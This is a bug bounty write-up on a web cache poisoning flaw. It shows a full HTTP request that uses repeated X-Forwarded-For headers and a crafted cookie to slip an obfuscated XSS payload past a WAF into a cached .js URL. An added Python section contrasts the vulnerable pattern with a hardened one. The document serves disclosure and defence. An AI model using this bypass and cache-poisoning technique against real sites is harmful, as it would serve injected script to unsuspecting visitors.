How I Made $16,500 Hacking CDN Caching Servers — Part 2

bombon (@bxmbn), InfoSec Write-ups, Jan 29, 2022

A Nice Way To Hide XSS

Bounty: $2,000

While Google Dorking, I found a particular URL. This time the response was not being cached, but if I appended a cacheable file extension (.js, .css) to the end of the URL, the response would be cached.

Now all I needed was to find an XSS. I found an injection point in a cookie, but the WAF would trigger when I added anything after %20:

Cookie: cookiename=xss</script%20

While trying to bypass the WAF, I realized that my IP was also being reflected in that same script:

guid="</script ","24.99.19.20"

Since my IP was being reflected, I tried the "X-Forwarded-For" header; this way I could close the <script> and avoid the WAF, which would trigger if it detected <[anything]>.

This is why you will see 3 "X-Forwarded-For" headers.

Request:

GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2
Host: Redacted
X-Forwarded-For: xss
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`//
X-Forwarded-For: >
Cookie: gdId=xss</script%20

Response:

...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">
...

After poisoning a URL with an XSS, an attacker just needed to send it to the victim:

redacted.com/xxx/xx/xxx.xx/x.js?t=2021111121

A nice way to hide XSS :D
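The root cause above is request-controlled values (cookie and X-Forwarded-For) concatenated raw into an inline script, where a "</script" or a ">" ends the element early. The following added example is mine, not code from the post or the affected program, and it reconstructs that pattern hypothetically beside a hardened version: untrusted values are JSON-encoded with "<", ">" and the JS line terminators escaped, and X-Forwarded-For is only accepted when it parses as IP addresses. The function names and sample values are assumptions, with the values copied from the write-up's request.

```python
import ipaddress
import json

# Constructed samples taken from the write-up's request/response, not from any real server.
COOKIE_VALUE = "xss</script "
XFF_VALUES = ["xss", "xss><svg/onload=globalThis[`al`+/ert/.source]`1`//", ">"]
CLIENT_IP = "24.99.19.20"


def build_script_unsafe(cookie_value, client_ip, xff_values):
    """Hypothetical reconstruction of the vulnerable pattern: raw string
    concatenation into an inline <script>. A '</script' inside any value
    terminates the script element before the real closing tag."""
    parts = [cookie_value, client_ip, *xff_values]
    body = "guid=" + ",".join('"%s"' % p for p in parts)
    return "<script>" + body + "</script>"


def _json_for_script(value):
    """JSON-encode for inline-script use. json.dumps leaves '<' and '>'
    literally, so escape them (and U+2028/U+2029, which end a JS line)
    as \\uXXXX; the HTML parser then never sees a tag boundary."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c").replace(">", "\\u003e")
                   .replace("\u2028", "\\u2028").replace("\u2029", "\\u2029"))


def client_ips(xff_values):
    """Keep only syntactically valid IP addresses from X-Forwarded-For.
    Repeated headers are treated as one comma-separated list; any item
    that is not an IP (markup, script, a stray '>') is dropped, not reflected."""
    ips = []
    for header in xff_values:
        for item in header.split(","):
            try:
                ips.append(str(ipaddress.ip_address(item.strip())))
            except ValueError:
                continue
    return ips


def build_script_safe(cookie_value, client_ip, xff_values):
    """Hardened builder: validated IPs only, and every value JSON-encoded."""
    parts = [cookie_value, client_ip, *client_ips(xff_values)]
    return "<script>guid=" + _json_for_script(parts) + "</script>"
```

Independently of the encoding fix, a response whose body depends on request headers should not be shared-cacheable (Cache-Control: private or no-store), or the cache key must include those headers; otherwise one poisoned request is served to every later visitor of the .js URL.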

This was my favorite cache poisoning, and it was found on a public program:

https://hackerone.com/reports/1424094

Timeline:

Reported → December 11, 2021

Triaged → December 14, 2021

Bounty Awarded → January 7, 2022

Fixed → March 7, 2022

Next:

Part 3: Cache Poisoning DoS Via X-Forwarded-Scheme Header

